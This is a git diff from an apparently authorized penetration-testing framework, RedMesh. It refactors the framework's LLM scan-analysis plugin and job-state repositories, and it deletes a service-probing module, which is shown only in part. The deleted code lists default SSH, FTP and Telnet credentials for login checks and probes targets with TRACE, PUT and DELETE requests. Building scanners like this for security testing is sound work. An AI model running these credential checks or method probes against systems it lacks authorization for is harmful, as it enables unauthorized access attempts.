@@ -152,7 +249,7 @@ class RedmeshLlmAgentApiPlugin(BasePlugin): def on_init(self): """Initialize plugin and validate DeepSeek API key.""" - super(RedmeshLlmAgentApiPlugin, self).on_init() + super(RedMeshLlmAgentApiPlugin, self).on_init() self._api_key = self._load_api_key() self._request_count = 0 self._error_count = 0 @@ -221,7 +318,7 @@ def _load_api_key(self) -> Optional[str]: def P(self, s, *args, **kwargs): """Prefixed logger for RedMesh LLM messages.""" s = "[REDMESH_LLM] " + str(s) - return super(RedmeshLlmAgentApiPlugin, self).P(s, *args, **kwargs) + return super(RedMeshLlmAgentApiPlugin, self).P(s, *args, **kwargs) def Pd(self, s, *args, score=-1, **kwargs): """Debug logging with verbosity control.""" @@ -480,6 +577,7 @@ def analyze_scan( self, scan_results: Dict[str, Any], analysis_type: str = LLM_ANALYSIS_SECURITY_ASSESSMENT, + scan_type: str = "network", focus_areas: Optional[List[str]] = None, model: Optional[str] = None, temperature: Optional[float] = None, @@ -498,6 +596,9 @@ def analyze_scan( - "security_assessment" (default): Overall security posture evaluation - "vulnerability_summary": Prioritized list of findings with severity - "remediation_plan": Actionable steps to fix identified issues + scan_type : str, optional + Scan type: "network" (blackbox port scan) or "webapp" (authenticated graybox). + Selects the appropriate prompt set for the analysis. 
focus_areas : list of str, optional Specific areas to focus on: ["web", "network", "databases", "authentication"] model : str, optional @@ -532,8 +633,9 @@ def analyze_scan( "status": LLM_API_STATUS_ERROR, } - # Get system prompt for analysis type - system_prompt = ANALYSIS_PROMPTS.get(analysis_type, ANALYSIS_PROMPTS[LLM_ANALYSIS_SECURITY_ASSESSMENT]) + # Get system prompt for analysis type (scan-type-aware) + prompts = _get_analysis_prompts(scan_type or "network") + system_prompt = prompts.get(analysis_type, prompts[LLM_ANALYSIS_SECURITY_ASSESSMENT]) # Add focus areas if provided if focus_areas: @@ -585,9 +687,27 @@ def analyze_scan( # Get token usage for cost tracking usage = response.get("usage", {}) + # Build scan summary (scan-type-aware) + scan_summary = { + "scan_type": scan_type or "network", + } + if scan_type == "webapp": + graybox = scan_results.get("graybox_results", {}) + scenarios = graybox.get("scenarios", []) + scan_summary["total_scenarios"] = len(scenarios) + scan_summary["vulnerable"] = sum(1 for s in scenarios if s.get("status") == "vulnerable") + scan_summary["not_vulnerable"] = sum(1 for s in scenarios if s.get("status") == "not_vulnerable") + scan_summary["inconclusive"] = sum(1 for s in scenarios if s.get("status") == "inconclusive") + scan_summary["has_graybox_results"] = bool(scenarios) + else: + scan_summary["open_ports"] = len(scan_results.get("open_ports", [])) + scan_summary["has_service_info"] = "service_info" in scan_results + scan_summary["has_web_tests"] = "web_tests_info" in scan_results + # Return clean, minimal structure return { "analysis_type": analysis_type, + "scan_type": scan_type or "network", "focus_areas": focus_areas, "model": response.get("model"), "content": content, @@ -596,11 +716,7 @@ def analyze_scan( "completion_tokens": usage.get("completion_tokens"), "total_tokens": usage.get("total_tokens"), }, - "scan_summary": { - "open_ports": len(scan_results.get("open_ports", [])), - "has_service_info": "service_info" in 
scan_results, - "has_web_tests": "web_tests_info" in scan_results, - }, + "scan_summary": scan_summary, "created_at": self.time(), } @@ -610,5 +726,5 @@ def analyze_scan( def process(self): """Main plugin loop (minimal for this API-only plugin).""" - super(RedmeshLlmAgentApiPlugin, self).process() + super(RedMeshLlmAgentApiPlugin, self).process() return diff --git a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_mixin.py b/extensions/business/cybersec/red_mesh/redmesh_llm_agent_mixin.py deleted file mode 100644 index 770b8cc0..00000000 --- a/extensions/business/cybersec/red_mesh/redmesh_llm_agent_mixin.py +++ /dev/null @@ -1,402 +0,0 @@ -""" -LLM Agent API Mixin for RedMesh Pentester. - -This mixin provides LLM integration methods for analyzing scan results -via the RedMesh LLM Agent API (DeepSeek). - -Usage: - class PentesterApi01Plugin(_LlmAgentMixin, BasePlugin): - ... -""" - -import requests -from typing import Optional - -from .constants import RUN_MODE_SINGLEPASS - - -class _RedMeshLlmAgentMixin(object): - """ - Mixin providing LLM Agent API integration for RedMesh plugins. - - This mixin expects the host class to have the following config attributes: - - cfg_llm_agent_api_enabled: bool - - cfg_llm_agent_api_host: str - - cfg_llm_agent_api_port: int - - cfg_llm_agent_api_timeout: int - - cfg_llm_auto_analysis_type: str - - And the following methods/attributes: - - self.r1fs: R1FS instance - - self.P(): logging method - - self.Pd(): debug logging method - - self._get_aggregated_report(): report aggregation method - """ - - def __init__(self, **kwargs): - super(_RedMeshLlmAgentMixin, self).__init__(**kwargs) - return - - def _maybe_resolve_llm_agent_from_semaphore(self): - """ - If SEMAPHORED_KEYS is configured and LLM Agent is enabled, - read API_IP and API_PORT from semaphore env published by - the LLM Agent API plugin. Overrides static config values. 
- """ - if not self.cfg_llm_agent_api_enabled: - return False - semaphored_keys = getattr(self, 'cfg_semaphored_keys', None) - if not semaphored_keys: - return False - if not self.semaphore_is_ready(): - return False - env = self.semaphore_get_env() - if not env: - return False - api_host = env.get('API_IP') or env.get('API_HOST') or env.get('HOST') - api_port = env.get('PORT') or env.get('API_PORT') - if api_host and api_port: - self.P("Resolved LLM Agent API from semaphore: {}:{}".format(api_host, api_port)) - self.config_data['LLM_AGENT_API_HOST'] = api_host - self.config_data['LLM_AGENT_API_PORT'] = int(api_port) - return True - return False - - def _get_llm_agent_api_url(self, endpoint: str) -> str: - """ - Build URL for LLM Agent API endpoint. - - Parameters - ---------- - endpoint : str - API endpoint path (e.g., "/chat", "/analyze_scan"). - - Returns - ------- - str - Full URL to the endpoint. - """ - host = self.cfg_llm_agent_api_host - port = self.cfg_llm_agent_api_port - endpoint = endpoint.lstrip("/") - return f"http://{host}:{port}/{endpoint}" - - def _call_llm_agent_api( - self, - endpoint: str, - method: str = "POST", - payload: dict = None, - timeout: int = None - ) -> dict: - """ - Make HTTP request to the LLM Agent API. - - Parameters - ---------- - endpoint : str - API endpoint to call (e.g., "/analyze_scan", "/health"). - method : str, optional - HTTP method (default: "POST"). - payload : dict, optional - JSON payload for POST requests. - timeout : int, optional - Request timeout in seconds. - - Returns - ------- - dict - API response or error object. 
- """ - if not self.cfg_llm_agent_api_enabled: - return {"error": "LLM Agent API is not enabled", "status": "disabled"} - - if not self.cfg_llm_agent_api_port: - return {"error": "LLM Agent API port not configured", "status": "config_error"} - - url = self._get_llm_agent_api_url(endpoint) - timeout = timeout or self.cfg_llm_agent_api_timeout - - try: - self.Pd(f"Calling LLM Agent API: {method} {url}") - - if method.upper() == "GET": - response = requests.get(url, timeout=timeout) - else: - response = requests.post( - url, - json=payload or {}, - headers={"Content-Type": "application/json"}, - timeout=timeout - ) - - if response.status_code != 200: - return { - "error": f"LLM Agent API returned status {response.status_code}", - "status": "api_error", - "details": response.text - } - - # Unwrap response if FastAPI wrapped it (extract 'result' from envelope) - response_data = response.json() - if isinstance(response_data, dict) and "result" in response_data: - return response_data["result"] - return response_data - - except requests.exceptions.ConnectionError: - self.P(f"LLM Agent API not reachable at {url}", color='y') - return {"error": "LLM Agent API not reachable", "status": "connection_error"} - except requests.exceptions.Timeout: - self.P(f"LLM Agent API request timed out", color='y') - return {"error": "LLM Agent API request timed out", "status": "timeout"} - except Exception as e: - self.P(f"Error calling LLM Agent API: {e}", color='r') - return {"error": str(e), "status": "error"} - - def _auto_analyze_report(self, job_id: str, report: dict, target: str) -> Optional[dict]: - """ - Automatically analyze a completed scan report using LLM Agent API. - - Parameters - ---------- - job_id : str - Identifier of the completed job. - report : dict - Aggregated scan report to analyze. - target : str - Target hostname/IP that was scanned. - - Returns - ------- - dict or None - LLM analysis result or None if disabled/failed. 
- """ - if not self.cfg_llm_agent_api_enabled: - self.Pd("LLM auto-analysis skipped (not enabled)") - return None - - self.P(f"Running LLM auto-analysis for job {job_id}, target {target}...") - - analysis_result = self._call_llm_agent_api( - endpoint="/analyze_scan", - method="POST", - payload={ - "scan_results": report, - "analysis_type": self.cfg_llm_auto_analysis_type, - "focus_areas": None, - } - ) - - if "error" in analysis_result: - self.P(f"LLM auto-analysis failed for job {job_id}: {analysis_result.get('error')}", color='y') - else: - self.P(f"LLM auto-analysis completed for job {job_id}") - - return analysis_result - - def _collect_node_reports(self, workers: dict) -> dict: - """ - Collect individual node reports from all workers. - - Parameters - ---------- - workers : dict - Worker entries from job_specs containing report_cid or result. - - Returns - ------- - dict - Mapping {addr: report_dict} for each worker with data. - """ - all_reports = {} - - for addr, worker_entry in workers.items(): - report = None - report_cid = worker_entry.get("report_cid") - - # Try to fetch from R1FS first - if report_cid: - try: - report = self.r1fs.get_json(report_cid) - self.Pd(f"Fetched report from R1FS for worker {addr}: CID {report_cid}") - except Exception as e: - self.P(f"Failed to fetch report from R1FS for {addr}: {e}", color='y') - - # Fallback to direct result - if not report: - report = worker_entry.get("result") - - if report: - all_reports[addr] = report - - if not all_reports: - self.P("No reports found to collect", color='y') - - return all_reports - - def _run_aggregated_llm_analysis( - self, - job_id: str, - aggregated_report: dict, - job_config: dict, - ) -> str | None: - """ - Run LLM analysis on a pre-aggregated report. - - The caller aggregates once and passes the result. This method - no longer fetches node reports or saves to R1FS. - - Parameters - ---------- - job_id : str - Identifier of the job. 
- aggregated_report : dict - Pre-aggregated scan data from all workers. - job_config : dict - Job configuration (from R1FS). - - Returns - ------- - str or None - LLM analysis markdown text if successful, None otherwise. - """ - target = job_config.get("target", "unknown") - self.P(f"Running aggregated LLM analysis for job {job_id}, target {target}...") - - if not aggregated_report: - self.P(f"No data to analyze for job {job_id}", color='y') - return None - - # Add job metadata to report for context (strip node_ip — never send to LLM) - report_with_meta = {k: v for k, v in aggregated_report.items() if k != "node_ip"} - report_with_meta["_job_metadata"] = { - "job_id": job_id, - "target": target, - "start_port": job_config.get("start_port"), - "end_port": job_config.get("end_port"), - "enabled_features": job_config.get("enabled_features", []), - "run_mode": job_config.get("run_mode", RUN_MODE_SINGLEPASS), - } - - # Call LLM analysis - llm_analysis = self._auto_analyze_report(job_id, report_with_meta, target) - - if not llm_analysis or "error" in llm_analysis: - self.P( - f"LLM analysis failed for job {job_id}: {llm_analysis.get('error') if llm_analysis else 'No response'}", - color='y' - ) - return None - - # Extract the markdown text from the analysis result - if isinstance(llm_analysis, dict): - return llm_analysis.get("content", llm_analysis.get("analysis", llm_analysis.get("markdown", str(llm_analysis)))) - return str(llm_analysis) - - def _run_quick_summary_analysis( - self, - job_id: str, - aggregated_report: dict, - job_config: dict, - ) -> str | None: - """ - Run a short (2-4 sentence) AI quick summary on a pre-aggregated report. - - The caller aggregates once and passes the result. This method - no longer fetches node reports or saves to R1FS. - - Parameters - ---------- - job_id : str - Identifier of the job. - aggregated_report : dict - Pre-aggregated scan data from all workers. - job_config : dict - Job configuration (from R1FS). 
- - Returns - ------- - str or None - Quick summary text if successful, None otherwise. - """ - target = job_config.get("target", "unknown") - self.P(f"Running quick summary analysis for job {job_id}, target {target}...") - - if not aggregated_report: - self.P(f"No data for quick summary for job {job_id}", color='y') - return None - - # Add job metadata to report for context (strip node_ip — never send to LLM) - report_with_meta = {k: v for k, v in aggregated_report.items() if k != "node_ip"} - report_with_meta["_job_metadata"] = { - "job_id": job_id, - "target": target, - "start_port": job_config.get("start_port"), - "end_port": job_config.get("end_port"), - "enabled_features": job_config.get("enabled_features", []), - "run_mode": job_config.get("run_mode", RUN_MODE_SINGLEPASS), - } - - # Call LLM analysis with quick_summary type - analysis_result = self._call_llm_agent_api( - endpoint="/analyze_scan", - method="POST", - payload={ - "scan_results": report_with_meta, - "analysis_type": "quick_summary", - "focus_areas": None, - } - ) - - if not analysis_result or "error" in analysis_result: - self.P( - f"Quick summary failed for job {job_id}: {analysis_result.get('error') if analysis_result else 'No response'}", - color='y' - ) - return None - - # Extract the summary text from the result - if isinstance(analysis_result, dict): - return analysis_result.get("content", analysis_result.get("summary", analysis_result.get("analysis", str(analysis_result)))) - return str(analysis_result) - - def _get_llm_health_status(self) -> dict: - """ - Check health of the LLM Agent API connection. - - Returns - ------- - dict - Health status of the LLM Agent API. 
- """ - if not self.cfg_llm_agent_api_enabled: - return { - "enabled": False, - "status": "disabled", - "message": "LLM Agent API integration is disabled", - } - - if not self.cfg_llm_agent_api_port: - return { - "enabled": True, - "status": "config_error", - "message": "LLM Agent API port not configured", - } - - result = self._call_llm_agent_api(endpoint="/health", method="GET", timeout=5) - - if "error" in result: - return { - "enabled": True, - "status": result.get("status", "error"), - "message": result.get("error"), - "host": self.cfg_llm_agent_api_host, - "port": self.cfg_llm_agent_api_port, - } - - return { - "enabled": True, - "status": "ok", - "host": self.cfg_llm_agent_api_host, - "port": self.cfg_llm_agent_api_port, - "llm_agent_health": result, - } diff --git a/extensions/business/cybersec/red_mesh/repositories/__init__.py b/extensions/business/cybersec/red_mesh/repositories/__init__.py new file mode 100644 index 00000000..1651d9a3 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/repositories/__init__.py @@ -0,0 +1,7 @@ +from .artifacts import ArtifactRepository +from .cstore import JobStateRepository + +__all__ = [ + "ArtifactRepository", + "JobStateRepository", +] diff --git a/extensions/business/cybersec/red_mesh/repositories/artifacts.py b/extensions/business/cybersec/red_mesh/repositories/artifacts.py new file mode 100644 index 00000000..45a1580f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/repositories/artifacts.py @@ -0,0 +1,81 @@ +from ..models import JobArchive, JobConfig, PassReport + + +def _coerce_job_config_dict(payload): + raw = dict(payload or {}) + raw.setdefault("target", raw.get("target_url", "")) + raw.setdefault("start_port", 0) + raw.setdefault("end_port", 0) + return raw + + +class ArtifactRepository: + """Repository for durable RedMesh artifacts stored in R1FS.""" + + def __init__(self, owner): + self.owner = owner + + def get_json(self, cid, *, secret=None): + if not cid: + return None + if secret: + return 
self.owner.r1fs.get_json(cid, secret=secret) + return self.owner.r1fs.get_json(cid) + + def put_json(self, payload, *, show_logs=False, secret=None): + if secret: + return self.owner.r1fs.add_json(payload, show_logs=show_logs, secret=secret) + return self.owner.r1fs.add_json(payload, show_logs=show_logs) + + def delete(self, cid, *, show_logs=False, raise_on_error=False): + if not cid: + return False + return self.owner.r1fs.delete_file(cid, show_logs=show_logs, raise_on_error=raise_on_error) + + def get_job_config(self, job_specs): + return self.get_json((job_specs or {}).get("job_config_cid")) + + def get_job_config_model(self, job_specs): + payload = self.get_job_config(job_specs) + if not isinstance(payload, dict): + return None + return JobConfig.from_dict(_coerce_job_config_dict(payload)) + + def put_job_config(self, job_config, *, show_logs=False): + if isinstance(job_config, JobConfig): + payload = job_config.to_dict() + else: + payload = JobConfig.from_dict(_coerce_job_config_dict(job_config)).to_dict() + return self.put_json(payload, show_logs=show_logs) + + def get_pass_report(self, report_cid): + return self.get_json(report_cid) + + def get_pass_report_model(self, report_cid): + payload = self.get_pass_report(report_cid) + if not isinstance(payload, dict): + return None + return PassReport.from_dict(payload) + + def put_pass_report(self, pass_report, *, show_logs=False): + if isinstance(pass_report, PassReport): + payload = pass_report.to_dict() + else: + payload = PassReport.from_dict(pass_report).to_dict() + return self.put_json(payload, show_logs=show_logs) + + def get_archive(self, job_specs): + return self.get_json((job_specs or {}).get("job_cid")) + + def get_archive_model(self, job_specs): + payload = self.get_archive(job_specs) + if not isinstance(payload, dict): + return None + return JobArchive.from_dict(payload) + + def put_archive(self, archive, *, show_logs=False): + if isinstance(archive, JobArchive): + payload = archive.to_dict() + else: 
+ payload = JobArchive.from_dict(archive).to_dict() + return self.put_json(payload, show_logs=show_logs) diff --git a/extensions/business/cybersec/red_mesh/repositories/cstore.py b/extensions/business/cybersec/red_mesh/repositories/cstore.py new file mode 100644 index 00000000..71ea8ed8 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/repositories/cstore.py @@ -0,0 +1,223 @@ +from ..models import ( + CStoreJobFinalized, + CStoreJobRunning, + FindingTriageAuditEntry, + FindingTriageState, + WorkerProgress, +) + + +RUNNING_JOB_REQUIRED_FIELDS = { + "job_id", + "job_status", + "run_mode", + "launcher", + "target", + "start_port", + "end_port", + "date_created", + "job_config_cid", +} + + +class JobStateRepository: + """Repository for mutable RedMesh job state stored in CStore.""" + + def __init__(self, owner): + self.owner = owner + + @property + def _jobs_hkey(self): + return self.owner.cfg_instance_id + + @property + def _live_hkey(self): + return f"{self.owner.cfg_instance_id}:live" + + @property + def _triage_hkey(self): + return f"{self.owner.cfg_instance_id}:triage" + + @property + def _triage_audit_hkey(self): + return f"{self.owner.cfg_instance_id}:triage:audit" + + def get_job(self, job_id): + return self.owner.chainstore_hget(hkey=self._jobs_hkey, key=job_id) + + def _coerce_job_payload(self, value): + if isinstance(value, CStoreJobRunning): + return value.to_dict() + if isinstance(value, CStoreJobFinalized): + return value.to_dict() + if not isinstance(value, dict): + return value + payload = dict(value) + if payload.get("job_cid"): + try: + return CStoreJobFinalized.from_dict(payload).to_dict() + except (KeyError, TypeError, ValueError): + return payload + if RUNNING_JOB_REQUIRED_FIELDS.issubset(payload): + try: + return CStoreJobRunning.from_dict(payload).to_dict() + except (KeyError, TypeError, ValueError): + return payload + return payload + + def get_running_job(self, job_id): + payload = self.get_job(job_id) + if not isinstance(payload, dict) 
or payload.get("job_cid"): + return None + try: + return CStoreJobRunning.from_dict(payload) + except (KeyError, TypeError, ValueError): + return None + + def get_finalized_job(self, job_id): + payload = self.get_job(job_id) + if not isinstance(payload, dict) or not payload.get("job_cid"): + return None + try: + return CStoreJobFinalized.from_dict(payload) + except (KeyError, TypeError, ValueError): + return None + + def list_jobs(self): + return self.owner.chainstore_hgetall(hkey=self._jobs_hkey) + + def put_job(self, job_id, value): + payload = self._coerce_job_payload(value) + self.owner.chainstore_hset(hkey=self._jobs_hkey, key=job_id, value=payload) + return payload + + def put_running_job(self, job): + if isinstance(job, CStoreJobRunning): + payload = job.to_dict() + else: + payload = CStoreJobRunning.from_dict(job).to_dict() + return self.put_job(payload["job_id"], payload) + + def put_finalized_job(self, job): + if isinstance(job, CStoreJobFinalized): + payload = job.to_dict() + else: + payload = CStoreJobFinalized.from_dict(job).to_dict() + return self.put_job(payload["job_id"], payload) + + def delete_job(self, job_id): + self.owner.chainstore_hset(hkey=self._jobs_hkey, key=job_id, value=None) + return + + def list_live_progress(self): + return self.owner.chainstore_hgetall(hkey=self._live_hkey) + + def get_live_progress(self, key): + return self.owner.chainstore_hget(hkey=self._live_hkey, key=key) + + def get_live_progress_model(self, key): + payload = self.get_live_progress(key) + if not isinstance(payload, dict): + return None + return WorkerProgress.from_dict(payload) + + def put_live_progress(self, key, value): + self.owner.chainstore_hset(hkey=self._live_hkey, key=key, value=value) + return value + + def put_live_progress_model(self, progress): + if isinstance(progress, WorkerProgress): + payload = progress.to_dict() + else: + payload = WorkerProgress.from_dict(progress).to_dict() + key = f"{payload['job_id']}:{payload['worker_addr']}" + return 
self.put_live_progress(key, payload) + + def delete_live_progress(self, key): + self.owner.chainstore_hset(hkey=self._live_hkey, key=key, value=None) + return + + @staticmethod + def triage_key(job_id, finding_id): + return f"{job_id}:{finding_id}" + + def get_finding_triage(self, job_id, finding_id): + return self.owner.chainstore_hget( + hkey=self._triage_hkey, + key=self.triage_key(job_id, finding_id), + ) + + def get_finding_triage_model(self, job_id, finding_id): + payload = self.get_finding_triage(job_id, finding_id) + if not isinstance(payload, dict): + return None + return FindingTriageState.from_dict(payload) + + def list_job_triage(self, job_id): + payload = self.owner.chainstore_hgetall(hkey=self._triage_hkey) or {} + prefix = f"{job_id}:" + return { + key[len(prefix):]: value + for key, value in payload.items() + if isinstance(key, str) and key.startswith(prefix) and isinstance(value, dict) + } + + def list_job_triage_models(self, job_id): + return { + finding_id: FindingTriageState.from_dict(value) + for finding_id, value in self.list_job_triage(job_id).items() + } + + def put_finding_triage(self, triage): + if isinstance(triage, FindingTriageState): + payload = triage.to_dict() + else: + payload = FindingTriageState.from_dict(triage).to_dict() + self.owner.chainstore_hset( + hkey=self._triage_hkey, + key=self.triage_key(payload["job_id"], payload["finding_id"]), + value=payload, + ) + return payload + + def get_finding_triage_audit(self, job_id, finding_id): + payload = self.owner.chainstore_hget( + hkey=self._triage_audit_hkey, + key=self.triage_key(job_id, finding_id), + ) + return payload if isinstance(payload, list) else [] + + def list_job_triage_audit(self, job_id): + payload = self.owner.chainstore_hgetall(hkey=self._triage_audit_hkey) or {} + prefix = f"{job_id}:" + return { + key[len(prefix):]: value + for key, value in payload.items() + if isinstance(key, str) and key.startswith(prefix) and isinstance(value, list) + } + + def 
append_finding_triage_audit(self, entry): + if isinstance(entry, FindingTriageAuditEntry): + payload = entry.to_dict() + else: + payload = FindingTriageAuditEntry.from_dict(entry).to_dict() + key = self.triage_key(payload["job_id"], payload["finding_id"]) + audit_log = list(self.get_finding_triage_audit(payload["job_id"], payload["finding_id"])) + audit_log.append(payload) + self.owner.chainstore_hset(hkey=self._triage_audit_hkey, key=key, value=audit_log) + return audit_log + + def delete_job_triage(self, job_id): + for finding_id in list(self.list_job_triage(job_id)): + self.owner.chainstore_hset( + hkey=self._triage_hkey, + key=self.triage_key(job_id, finding_id), + value=None, + ) + for finding_id in list(self.list_job_triage_audit(job_id)): + self.owner.chainstore_hset( + hkey=self._triage_audit_hkey, + key=self.triage_key(job_id, finding_id), + value=None, + ) + return diff --git a/extensions/business/cybersec/red_mesh/service_mixin.py b/extensions/business/cybersec/red_mesh/service_mixin.py deleted file mode 100644 index 59fe5a32..00000000 --- a/extensions/business/cybersec/red_mesh/service_mixin.py +++ /dev/null @@ -1,5761 +0,0 @@ -import random -import re as _re -import socket -import struct -import ftplib -import requests -import ssl -from datetime import datetime - -import paramiko - -from .findings import Finding, Severity, probe_result, probe_error -from .cve_db import check_cves - -# Default credentials commonly found on exposed SSH services. -# Kept intentionally small — this is a quick check, not a brute-force. -_SSH_DEFAULT_CREDS = [ - ("root", "root"), - ("root", "toor"), - ("root", "password"), - ("admin", "admin"), - ("admin", "password"), - ("user", "user"), - ("test", "test"), -] - -# Default credentials for FTP services. -_FTP_DEFAULT_CREDS = [ - ("root", "root"), - ("admin", "admin"), - ("admin", "password"), - ("ftp", "ftp"), - ("user", "user"), - ("test", "test"), -] - -# Default credentials for Telnet services. 
-_TELNET_DEFAULT_CREDS = [ - ("root", "root"), - ("root", "toor"), - ("root", "password"), - ("admin", "admin"), - ("admin", "password"), - ("user", "user"), - ("test", "test"), -] - -_HTTP_SERVER_RE = _re.compile( - r'(Apache|nginx)[/ ]+(\d+(?:\.\d+)+)', _re.IGNORECASE, -) -_HTTP_PRODUCT_MAP = {'apache': 'apache', 'nginx': 'nginx'} - - -class _ServiceInfoMixin: - """ - Network service banner probes feeding RedMesh reports. - - Each helper focuses on a specific protocol and maps findings to - OWASP vulnerability families. The mixin is intentionally light-weight so - that `PentestLocalWorker` threads can run without heavy dependencies while - still surfacing high-signal clues. - """ - - def _emit_metadata(self, category, key_or_item, value=None): - """Safely append to scan_metadata sub-dicts without crashing if state is uninitialized.""" - meta = self.state.get("scan_metadata") - if meta is None: - return - bucket = meta.get(category) - if bucket is None: - return - if isinstance(bucket, dict): - bucket[key_or_item] = value - elif isinstance(bucket, list): - bucket.append(key_or_item) - - def _service_info_http(self, target, port): # default port: 80 - """ - Assess HTTP service: server fingerprint, technology detection, - dangerous HTTP methods, and page title extraction. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import re as _re - - findings = [] - scheme = "https" if port in (443, 8443) else "http" - url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" - - result = { - "banner": None, - "server": None, - "title": None, - "technologies": [], - "dangerous_methods": [], - } - - # --- 1. 
GET request — banner, server, title, tech fingerprint --- - try: - self.P(f"Fetching {url} for banner...") - ua = getattr(self, 'scanner_user_agent', '') - headers = {'User-Agent': ua} if ua else {} - resp = requests.get(url, timeout=5, verify=False, allow_redirects=True, headers=headers) - - result["banner"] = f"HTTP {resp.status_code} {resp.reason}" - result["server"] = resp.headers.get("Server") - if result["server"]: - self._emit_metadata("server_versions", port, result["server"]) - if result["server"]: - _m = _HTTP_SERVER_RE.search(result["server"]) - if _m: - _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) - if _cve_product: - findings += check_cves(_cve_product, _m.group(2)) - powered_by = resp.headers.get("X-Powered-By") - - # Page title - title_match = _re.search( - r"(.*?)", resp.text[:5000], _re.IGNORECASE | _re.DOTALL - ) - if title_match: - result["title"] = title_match.group(1).strip()[:100] - - # Technology fingerprinting - body_lower = resp.text[:8000].lower() - tech_signatures = { - "WordPress": ["wp-content", "wp-includes"], - "Joomla": ["com_content", "/media/jui/"], - "Drupal": ["drupal.js", "sites/default/files"], - "Django": ["csrfmiddlewaretoken"], - "PHP": [".php", "phpsessid"], - "ASP.NET": ["__viewstate", ".aspx"], - "React": ["_next/", "__next_data__", "react"], - } - techs = [] - if result["server"]: - techs.append(result["server"]) - if powered_by: - techs.append(powered_by) - for tech, markers in tech_signatures.items(): - if any(m in body_lower for m in markers): - techs.append(tech) - result["technologies"] = techs - - except Exception as e: - # HTTP library failed (e.g. empty reply, connection reset). - # Fall back to raw socket probe — try HTTP/1.0 without Host header - # (some servers like nginx drop requests with unrecognized Host values). 
- try: - _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - _s.settimeout(3) - _s.connect((target, port)) - # Use HTTP/1.0 without Host — matches nmap's GetRequest probe - _s.send(b"GET / HTTP/1.0\r\n\r\n") - _raw = b"" - while True: - chunk = _s.recv(4096) - if not chunk: - break - _raw += chunk - if len(_raw) > 16384: - break - _s.close() - _raw_str = _raw.decode("utf-8", errors="ignore") - if _raw_str: - lines = _raw_str.split("\r\n") - result["banner"] = lines[0].strip() if lines else "unknown" - for line in lines[1:]: - low = line.lower() - if low.startswith("server:"): - result["server"] = line.split(":", 1)[1].strip() - break - # Report that the server drops Host-header requests - findings.append(Finding( - severity=Severity.INFO, - title="HTTP service drops requests with Host header", - description=f"TCP port {port} returns empty replies for standard HTTP/1.1 " - "requests but responds to HTTP/1.0 without a Host header. " - "This indicates a server_name mismatch or intentional filtering.", - evidence=f"HTTP/1.1 with Host:{target} → empty reply; " - f"HTTP/1.0 without Host → {result['banner']}", - remediation="Configure a proper default server block or virtual host.", - cwe_id="CWE-200", - confidence="certain", - )) - # Check for directory listing in response body - body_start = _raw_str.find("\r\n\r\n") - if body_start > -1: - body = _raw_str[body_start + 4:] - if "directory listing" in body.lower() or "
  • (.*?)", body[:5000], _re.IGNORECASE | _re.DOTALL) - if title_m: - result["title"] = title_m.group(1).strip()[:100] - else: - result["banner"] = "(empty reply)" - findings.append(Finding( - severity=Severity.INFO, - title="HTTP service returns empty reply", - description=f"TCP port {port} accepts connections but the server " - "closes without sending any HTTP response data.", - evidence=f"Raw socket to {target}:{port} — connected OK, received 0 bytes.", - remediation="Investigate why the server sends empty replies; " - "verify proxy/upstream configuration.", - cwe_id="CWE-200", - confidence="certain", - )) - except Exception: - return probe_error(target, port, "HTTP", e) - return probe_result(raw_data=result, findings=findings) - - # --- 2. Dangerous HTTP methods --- - dangerous = [] - for method in ("TRACE", "PUT", "DELETE"): - try: - r = requests.request(method, url, timeout=3, verify=False) - if r.status_code < 400: - dangerous.append(method) - except Exception: - pass - - result["dangerous_methods"] = dangerous - if "TRACE" in dangerous: - findings.append(Finding( - severity=Severity.MEDIUM, - title="HTTP TRACE method enabled (cross-site tracing / XST attack vector).", - description="TRACE echoes request bodies back, enabling cross-site tracing attacks.", - evidence=f"TRACE {url} returned status < 400.", - remediation="Disable the TRACE method in the web server configuration.", - owasp_id="A05:2021", - cwe_id="CWE-693", - confidence="certain", - )) - if "PUT" in dangerous: - findings.append(Finding( - severity=Severity.HIGH, - title="HTTP PUT method enabled (potential unauthorized file upload).", - description="The PUT method allows uploading files to the server.", - evidence=f"PUT {url} returned status < 400.", - remediation="Disable the PUT method or restrict it to authenticated users.", - owasp_id="A01:2021", - cwe_id="CWE-749", - confidence="certain", - )) - if "DELETE" in dangerous: - findings.append(Finding( - severity=Severity.HIGH, - title="HTTP 
DELETE method enabled (potential unauthorized file deletion).", - description="The DELETE method allows removing resources from the server.", - evidence=f"DELETE {url} returned status < 400.", - remediation="Disable the DELETE method or restrict it to authenticated users.", - owasp_id="A01:2021", - cwe_id="CWE-749", - confidence="certain", - )) - - return probe_result(raw_data=result, findings=findings) - - - def _service_info_http_alt(self, target, port): # default port: 8080 - """ - Probe alternate HTTP port 8080 for verbose banners. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - # Skip standard HTTP ports — they are covered by _service_info_http. - if port in (80, 443): - return None - - findings = [] - raw = {"banner": None, "server": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - ua = getattr(self, 'scanner_user_agent', '') - ua_header = f"\r\nUser-Agent: {ua}" if ua else "" - msg = "HEAD / HTTP/1.1\r\nHost: {}{}\r\n\r\n".format(target, ua_header).encode('utf-8') - sock.send(bytes(msg)) - data = sock.recv(1024).decode('utf-8', errors='ignore') - sock.close() - - if data: - # Extract status line and Server header instead of dumping raw bytes - lines = data.split("\r\n") - status_line = lines[0].strip() if lines else "unknown" - raw["banner"] = status_line - for line in lines[1:]: - if line.lower().startswith("server:"): - raw["server"] = line.split(":", 1)[1].strip() - break - - # NOTE: CVE matching intentionally omitted here — _service_info_http - # already handles CVE lookups for all HTTP ports. Emitting them here - # caused duplicate findings on non-standard ports (batch 3 dedup fix). 
